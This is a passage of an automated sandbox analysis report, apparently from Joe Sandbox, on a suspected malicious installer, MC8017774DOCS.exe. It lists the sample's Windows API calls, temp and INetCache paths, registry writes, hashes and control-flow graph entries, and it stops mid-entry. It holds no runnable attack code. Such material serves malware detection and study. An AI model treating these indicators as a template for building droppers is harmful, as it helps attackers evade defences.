• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\nse865B.tmp$C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll$Call
• API String ID: 1941528284-656889067
• Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
• Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
• Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
• Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

Control-flow Graph: function starting at 406601 (executed / not-executed node graph not reproduced in text)
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
• wsprintfW.USER32 ref: 00406653
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
• Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

Control-flow Graph: function starting at 403116 (executed / not-executed node graph not reproduced in text)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%
• API String ID: 551687249-2449383134
• Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
• Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
• Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
• Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

Control-flow Graph: function starting at 4057ce (executed / not-executed node graph not reproduced in text)
APIs
• CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
• GetLastError.KERNEL32 ref: 00405825
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
• GetLastError.KERNEL32 ref: 00405844
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                    • API String ID: 3449924974-3125694417
                                                                                                                                                    • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                    • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                                                                                    • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                    • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 988 405dbc-405dc8 989 405dc9-405dfd GetTickCount GetTempFileNameW 988->989 990 405e0c-405e0e 989->990 991 405dff-405e01 989->991 993 405e06-405e09 990->993 991->989 992 405e03 991->992 992->993
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\MC8017774DOCS.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6), ref: 00405DF5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                    • API String ID: 1716503409-1820667212
                                                                                                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                    • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                    • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 994 6e9b177b-6e9b17ba call 6e9b1b63 998 6e9b18da-6e9b18dc 994->998 999 6e9b17c0-6e9b17c4 994->999 1000 6e9b17cd-6e9b17da call 6e9b2398 999->1000 1001 6e9b17c6-6e9b17cc call 6e9b2356 999->1001 1006 6e9b180a-6e9b1811 1000->1006 1007 6e9b17dc-6e9b17e1 1000->1007 1001->1000 1008 6e9b1813-6e9b182f call 6e9b256d call 6e9b15b4 call 6e9b1272 GlobalFree 1006->1008 1009 6e9b1831-6e9b1835 1006->1009 1010 6e9b17fc-6e9b17ff 1007->1010 1011 6e9b17e3-6e9b17e4 1007->1011 1033 6e9b1889-6e9b188d 1008->1033 1016 6e9b1882-6e9b1888 call 6e9b256d 1009->1016 1017 6e9b1837-6e9b1880 call 6e9b15c6 call 6e9b256d 1009->1017 1010->1006 1012 6e9b1801-6e9b1802 call 6e9b2d2f 1010->1012 1014 6e9b17ec-6e9b17ed call 6e9b2a74 1011->1014 1015 6e9b17e6-6e9b17e7 1011->1015 1025 6e9b1807 1012->1025 1028 6e9b17f2 1014->1028 1021 6e9b17e9-6e9b17ea 1015->1021 1022 6e9b17f4-6e9b17fa call 6e9b2728 1015->1022 1016->1033 1017->1033 1021->1006 1021->1014 1032 6e9b1809 1022->1032 1025->1032 1028->1025 1032->1006 1037 6e9b18ca-6e9b18d1 1033->1037 1038 6e9b188f-6e9b189d call 6e9b2530 1033->1038 1037->998 1040 6e9b18d3-6e9b18d4 GlobalFree 1037->1040 1044 6e9b189f-6e9b18a2 1038->1044 1045 6e9b18b5-6e9b18bc 1038->1045 1040->998 1044->1045 1046 6e9b18a4-6e9b18ac 1044->1046 1045->1037 1047 6e9b18be-6e9b18c9 call 6e9b153d 1045->1047 1046->1045 1048 6e9b18ae-6e9b18af FreeLibrary 1046->1048 1047->1037 1048->1045
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E9B1B63: GlobalFree.KERNEL32(?), ref: 6E9B1DB6
                                                                                                                                                      • Part of subcall function 6E9B1B63: GlobalFree.KERNEL32(?), ref: 6E9B1DBB
                                                                                                                                                      • Part of subcall function 6E9B1B63: GlobalFree.KERNEL32(?), ref: 6E9B1DC0
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B1829
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6E9B18AF
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B18D4
                                                                                                                                                      • Part of subcall function 6E9B2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6E9B2387
                                                                                                                                                      • Part of subcall function 6E9B2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E9B17FA,00000000), ref: 6E9B27F8
                                                                                                                                                      • Part of subcall function 6E9B15C6: lstrcpyW.KERNEL32(?,6E9B4020,00000000,6E9B15C3,?,00000000,6E9B1753,00000000), ref: 6E9B15DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                                    • Opcode ID: c57e560a4f7fecf10f060fd0130746fce5ab0d1756ae2ceadb644f05e30cc407
                                                                                                                                                    • Instruction ID: a98fe10586dbc9befab344134bcf0e372016a8706fab3f72823e9269adaa4bd7
                                                                                                                                                    • Opcode Fuzzy Hash: c57e560a4f7fecf10f060fd0130746fce5ab0d1756ae2ceadb644f05e30cc407
                                                                                                                                                    • Instruction Fuzzy Hash: C141B1B18042459ADF009FF698D8BDB37ACBF57314F0449A5E9169B186EBB8C588CF60

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1051 4023e4-402415 call 402c41 * 2 call 402cd1 1058 402ac5-402ad4 1051->1058 1059 40241b-402425 1051->1059 1061 402427-402434 call 402c41 lstrlenW 1059->1061 1062 402438-40243b 1059->1062 1061->1062 1064 40243d-40244e call 402c1f 1062->1064 1065 40244f-402452 1062->1065 1064->1065 1069 402463-402477 RegSetValueExW 1065->1069 1070 402454-40245e call 403116 1065->1070 1073 402479 1069->1073 1074 40247c-40255d RegCloseKey 1069->1074 1070->1069 1073->1074 1074->1058 1076 40288b-402892 1074->1076 1076->1058
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
                                                                                                                                                    • API String ID: 2655323295-2695492296
                                                                                                                                                    • Opcode ID: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                                    • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                                                                                                    • Opcode Fuzzy Hash: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                                    • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
APIs
  • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,00000000,000000F0), ref: 0040164D
Strings
• C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 00401640
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
• API String ID: 1892508949-3732074636
• Opcode ID: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
• Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
• Opcode Fuzzy Hash: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
• Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
APIs
• IsWindowVisible.USER32(?), ref: 004052A2
• CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
  • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
• Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
• Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
• Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
  • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
  • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
  • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,762323A0), ref: 0040535A
  • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
  • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
• Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
• Opcode Fuzzy Hash: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
• Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401BE7
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: Call
• API String ID: 3394109436-1824292864
• Opcode ID: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
• Instruction ID: ae3691a386166457dd68fa0d34360560a99e353b90efe6619b1f582ab4c46bbf
• Opcode Fuzzy Hash: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
• Instruction Fuzzy Hash: 9B219973600100DBDB20EF94DD8595E77A4AB44318735053FF102F32D0DBB8A8909BAD
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                    • Opcode ID: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                                    • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                                                                                                    • Opcode Fuzzy Hash: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                                    • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                                    • Opcode ID: 9fca805e47e3346da069bb4f6cfd40e8b298e1ce21a0c1b748eae4cc8240b298
                                                                                                                                                    • Instruction ID: ad238ad36cd120687bb67b63ab2e0cf39ea52a9db7c0428984e644ee49cb5b09
                                                                                                                                                    • Opcode Fuzzy Hash: 9fca805e47e3346da069bb4f6cfd40e8b298e1ce21a0c1b748eae4cc8240b298
                                                                                                                                                    • Instruction Fuzzy Hash: 04513CB1908614AFDB20DFE4D985B9B777DEF96358F204829E40497290EB38D8829F91
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                    • Opcode ID: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                                    • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                                                                                                    • Opcode Fuzzy Hash: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                                    • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                                                                                                    APIs
                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                    • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
